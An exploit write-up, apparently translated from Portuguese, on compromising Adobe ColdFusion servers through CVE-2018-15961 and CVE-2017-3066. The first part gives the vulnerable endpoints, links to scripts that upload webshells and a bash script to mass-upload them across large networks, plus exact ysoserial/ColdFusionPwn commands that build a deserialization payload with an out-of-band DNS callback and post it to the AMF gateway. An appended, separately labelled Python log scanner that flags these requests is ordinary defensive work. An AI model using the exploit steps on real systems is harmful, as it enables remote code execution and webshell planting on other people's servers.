PT-BR PAPER
In this paper I will show how to exploit CVE-2018-15961 and CVE-2017-3066.
ColdFusion web server endpoints: .cfc, .cfm, .cfml and others.
############## first CVE: CVE-2018-15961 ##############
entrypoint: /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm
reference exploit: https://github.com/xbufu/CVE-2018-15961
I made some edits to the exploit to upload a webshell for Linux and Windows and automated the process; the PoC of its use follows below.
linux.py: https://pastebin.com/raw/URCw5TN3
windows.py: https://pastebin.com/raw/V8irZmh7
And I wrote a simple bash script to automate the web shell upload; this is very useful when the pentest target's network is very large.
vulns.sh: https://pastebin.com/raw/SsrRSjix
chmod +x vulns.sh
./vulns.sh  # have fun
############## ColdFusion AMF Deserialization CVE-2017-3066 ##############
reference: https://github.com/vulhub/vulhub/blob/master/coldfusion/CVE-2017-3066/README.md
reference: https://github.com/codewhitesec/ColdFusionPwn
don't forget ysoserial xD
entrypoint: /flex2gateway/amf
response: blank page
dork: the same as the previous ones
e.g. http://example.com/flex2gateway/amf
Testing for blind RCE to see whether it is vulnerable: on Linux, install the interactsh client with
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest
then run
interactsh-client -v -o interactsh-logs.txt
We generate a PoC using the DNS name issued by interactsh.
example:
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 "nslookup c7d125umno72mcpu9d50c8pbnfayyyyyn.interact.sh" poc
and run our payload against the target:
http post http://example.com/flex2gateway/amf Content-Type:application/x-amf < poc
################
For academic purposes only. I am not responsible for illegal acts.
Thanks!
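Both techniques above leave a recognisable trace in the web server's access log: the first is a POST to the CKEditor file-manager upload.cfm, the second a POST to /flex2gateway/amf (which a Flex client also does legitimately, so it is a lead to correlate, not proof). The following scanner is an added example for defenders and is not code from this write-up or from the referenced exploit projects. It assumes Apache/nginx "combined" log format; the log lines embedded below are constructed, and the rule names are my own.

```python
"""Flag access-log entries that touch the two ColdFusion endpoints discussed
in the write-up: the CKEditor file-manager upload.cfm (CVE-2018-15961) and the
/flex2gateway/amf AMF endpoint (CVE-2017-3066). Added example; the sample log
lines are constructed, not captured from a real server."""
import re
from typing import Dict, Iterable, List

# Apache/nginx "combined" log format (assumed layout for the constructed sample).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Endpoints named in the write-up; compared case-insensitively because
# ColdFusion behind IIS serves them regardless of case.
UPLOAD_CFM = "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm"
AMF_GATEWAY = "/flex2gateway/amf"

# Constructed sample: one benign page view, one upload attempt, one AMF POST
# that got the "blank page" (size 0), one benign GET and one unparsable line.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.cfm HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm?path=test HTTP/1.1" 200 312 "-" "python-requests/2.31"
198.51.100.9 - - [10/Oct/2023:13:56:02 +0000] "POST /flex2gateway/amf HTTP/1.1" 200 0 "-" "HTTPie/3.2.2"
192.0.2.4 - - [10/Oct/2023:13:56:10 +0000] "GET /flex2gateway/amf HTTP/1.1" 200 0 "-" "Mozilla/5.0"
not a log line
"""


def parse_line(line: str) -> Dict[str, str]:
    """Return the named fields of one combined-format line, or {} if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else {}


def classify(entry: Dict[str, str]) -> List[str]:
    """Return the names of the detection rules that fire for one parsed entry."""
    hits: List[str] = []
    path = entry["path"].split("?", 1)[0].lower()  # drop the query string
    if path == UPLOAD_CFM and entry["method"] == "POST":
        # CVE-2018-15961: unauthenticated file upload; any POST here is suspicious.
        hits.append("cve-2018-15961-upload")
    if path.startswith(AMF_GATEWAY) and entry["method"] == "POST":
        # CVE-2017-3066: AMF deserialization. Legitimate Flex clients also POST
        # here, so correlate with DNS/outbound traffic from the server before acting.
        hits.append("cve-2017-3066-amf-post")
    return hits


def scan_log(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Run every rule over every line; unparsable lines are skipped, not fatal."""
    findings: List[Dict[str, str]] = []
    for line in lines:
        entry = parse_line(line)
        if not entry:
            continue
        for rule in classify(entry):
            findings.append({"rule": rule, "ip": entry["ip"],
                             "ts": entry["ts"], "path": entry["path"]})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{f['rule']:24} {f['ip']:14} {f['ts']}  {f['path']}")
```

Run it against a real log with `scan_log(open("access.log"))`. The upload rule is high-confidence on a patched-but-still-exposed server only if the endpoint should not be reachable at all; the AMF rule is a correlation lead, which is why the blind-RCE check in the write-up relies on an out-of-band DNS lookup that the defender can look for in the server's DNS logs.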